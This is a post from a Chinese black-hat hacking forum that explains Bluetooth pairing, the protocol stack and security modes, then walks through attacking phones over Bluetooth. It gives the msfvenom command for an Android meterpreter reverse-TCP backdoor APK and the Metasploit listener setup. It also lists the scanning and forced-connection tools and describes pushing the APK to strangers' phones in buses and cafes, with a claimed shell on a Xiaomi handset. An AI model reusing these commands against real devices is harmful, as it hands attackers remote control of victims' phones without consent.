设为首页
收藏本站
黑币充值
VIP购买
用户登录
用户注册
请
登录
后使用快捷导航
没有帐号?
会员注册
用户名
Email
自动登录
找回密码
密码
登录
会员注册
论坛
家园
任务
排行榜
服务器
总版规
广告投放
邀请码
VIP购买
官方QQ群:
每日签到
会员求助
云排名
计算机基础
黑帽seo
白帽seo
建站分享
网赚营销
网络安全
linux交流
windows
资源教程
编程开发
数据库
艺术设计
视频制作
IT新闻
人生百态
金点子
每日签到
信息监察
站务公告
职位申请
站内投稿
站群服务
黑帽联盟
»
论坛
›
系统/web安全
›
网络安全
›
蓝牙攻击-基础篇
返回列表
查看:
1957
|
回复:
0
[无线安全]
蓝牙攻击-基础篇
[复制链接]
yun
yun
当前离线
窥视卡
雷达卡
920
主题
37
听众
1364
积分
超级版主
TA的每日心情
奋斗
2019-10-18 11:20
签到天数: 678 天
[LV.9]以坛为家II
收听TA
发消息
电梯直达
楼主
|
只看该作者
|
倒序浏览
此篇文章仅作为技术探讨,不可用于非法活动,否则后果自负
记得前阵子有一个高中生在老师上课的时候黑了教学的电脑,播放的黄色视屏。其实用的就是这个蓝牙攻击技术
背景
刚接触蓝牙,于是玩了那么一下下,现在分享出来,希望能与大家一起学习
先来了解蓝牙哈 (ˉ▽ˉ)~(如果哪里错啦,希望大大萌轻点打~(>﹏<)~)
初次相识
蓝牙是一种低功率,近场通信的通用协议,工作在2.4 – 2.485 GHz,使用扩展频谱,每秒1600跳频(频率每秒改变1600次)
跳频了解:
http://baike.baidu.com/link?url=0cwODpHwtIpYPP9v1mqnGQrtIfuWwUqhjl5xlXxcwKxI_ga3LwLWrIgkxkv9ZdUX
蓝牙范围最小规格为10米,但是制造商在其设备中实现的范围是没有限制(例如加入些放大器)。很多设备的范围可长达100米。只要有特殊的天线,就可以扩大范围。
当两个蓝牙设备连接时,这被称为配对(你们懂的O(≧▽≦)O)。几乎任何两个蓝牙设备都可以彼此连接。任何可发现的蓝牙设备会传输以下信息:
名称
类(不知道是不是这么叫 = =)
服务列表
技术信息
当两个设备配对时,它们交换预共享的私钥或连接密钥。每个存储此连接密钥的设备会在将来配对中识别另一个。
每个设备都有唯一的48位标识符(类似MAC地址),通常是制造商分配的名称。
配对过程如下:
2017-4-11 17:03 上传
下载附件
(854.17 KB)
另外,蓝牙设备会创建所谓的微微网或非常小的网络。在微微网中,有一个主机和多达七个活动的从机。由于蓝牙使用跳频,这些设备的通信是不会相互干扰的(因为使用相同频率的两个设备的机会非常小)
相恋基础
蓝牙协议栈大概如下:
2017-4-11 17:04 上传
下载附件
(580.97 KB)
蓝牙设备不需要使用堆栈中所有协议(如TCP / IP堆栈)。 蓝牙堆栈被开发是为了能够通过各种通信应用使用蓝牙。通常,应用程序只使用该堆栈的一个垂直切片。
蓝牙协议层及其相关协议如下:
蓝牙核心协议基带:LMP,L2CAP,SDP
电缆更换协议:RFCOMM
电话控制协议:TCS二进制,AT命令
采用的协议:PPP,UDP / TCP / IP,OBEX,WAP,vCard,vCal,IrMC,WAE
除了协议层之外,蓝牙规范还定义了主机控制器接口(HCI),这为基带控制器,链路管理器以及硬件状态和控制寄存器的访问提供了命令接口。
严防小三
蓝牙安全基于几种技术。 首先,跳频。 主机和从机都知道跳频算法,但是其他设备不知道。第二,在配对时交换的用于认证和加密的预共享密钥(128位)。
蓝牙有三种安全模式:
安全模式1:没有活动安全性
安全模式2:服务级别安全。集中式安全管理器处理身份验证,配置和授权。可能未被用户激活。
安全模式3:设备级安全。基于密钥的身份验证和加密。
爱的抱抱
蓝牙协议栈在Linux的实现是BlueZ,大多数Linux发行版都默认安装,如Kali默认安装,BlueZ有一些简单的工具,我们可以用来管理和Hack蓝牙。
hciconfig:此工具与Linux中的ifconfig操作非常相似,使用它来启动蓝牙接口(hci0),其次,查询设备的规格。
hcitool:这是一个查询工具。 可以用来查询设备名称,设备ID,设备类别和设备时钟。
hcidump:可以使用这个来嗅探蓝牙通信
爱的考验
下面结合metasploit进行蓝牙hack
环境:手机开启蓝牙,目标与攻击者处于同一局域网
原理:检测到蓝牙开启,向目标发送后门程序,metasploit “肾透支~~~”
应用场景:公交车,地铁,咖啡厅等公开共享网络环境 ,pia~~~ (⊙o⊙)
一、使用metasploit生成Android后门
msfvenom –p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} R > ~/fuck.apk
复制代码
打开msf,启动监听
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port}
show options
exploit
复制代码
二、蓝牙工具
查看设备:hciconfig
激活设备:hciconfig hci0 up
扫描蓝牙设备:hcitool scan
若如果对方开启隐藏,可以使用fang工具扫描隐藏的蓝牙设备
:::接下来就是:::
霸王。。。(x_x)(强行连接)
blueranger.sh { hciX} { bdaddr }
三、发送APK
在新版用blueman发送没成,然后用了旧版kali下的bluetooth-sendto进行发送,好了,就等他点击了,即可获得meterpreter ~
2017-4-11 17:04 上传
下载附件
(367.55 KB)
通过对小米手机测试,成功取得meterpreter
2017-4-11 17:04 上传
下载附件
(116.3 KB)
经不起考验,那就来个小姐
可能有人觉得,发送apk还要安装运行,会比较难利用,但是我觉得,如果是在一些公共场合,再结合其他环境。。。
蓝牙设备攻击
,
无线安全
转播
0
淘帖
0
分享
0
收藏
0
赞
1
踩
0
帖子永久地址:
推荐给好友
黑帽联盟 - 论坛版权
1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
2、本站所有主题由该帖子作者发表,该帖子作者与
黑帽联盟
享有帖子相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和
黑帽联盟
的同意
4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、
黑帽联盟
管理员和版主有权不事先通知发贴者而删除本文
相关帖子
•
突破arp防火墙继续嗅探
•
利用Wireshark监测无线网络
•
号称史上最全的密码字典
•
无线网卡Linux驱动和密码PJ教程
•
将openSUSE安装到U盘
•
linux 下利用reaver和aircrack-ng破解wpa,wpa2教程
•
backtrack支持无线网卡驱动
•
电脑遭受ARP攻击的解决办法
•
局域网断网神器 可查看WIFI密码 可测网速
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
会员注册
发表回复
回帖并转播
回帖后跳转到最后一页
发布主题
!fastreply!
收藏帖子
返回列表
搜索
个人中心
个人中心
登录或注册
回顶部
积分 0, 距离下一级还需 积分
回顶部